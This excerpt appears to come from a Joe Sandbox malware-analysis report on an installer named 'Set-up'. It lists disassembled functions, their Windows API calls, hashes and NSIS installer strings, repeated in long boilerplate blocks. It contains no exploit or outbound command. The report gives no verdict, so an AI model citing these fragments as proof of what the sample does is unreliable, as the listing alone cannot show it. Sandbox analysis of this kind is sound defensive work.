                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                      • String ID: HideWindow
                                      • API String ID: 1249568736-780306582
                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                      Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                      Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                      Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                      Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                      Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID:
                                      • API String ID: 4115351271-0
                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                      Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                      Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                      Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                      Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                      Non-executed Functions

                                      Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $ @$M$N
                                      • API String ID: 1638840714-3479655940
                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                      Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                      Strings
                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                      • ptF, xrefs: 00406D1A
                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                      • \*.*, xrefs: 00406D2F
                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                      • API String ID: 2035342205-1650287579
                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                      Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406902
                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
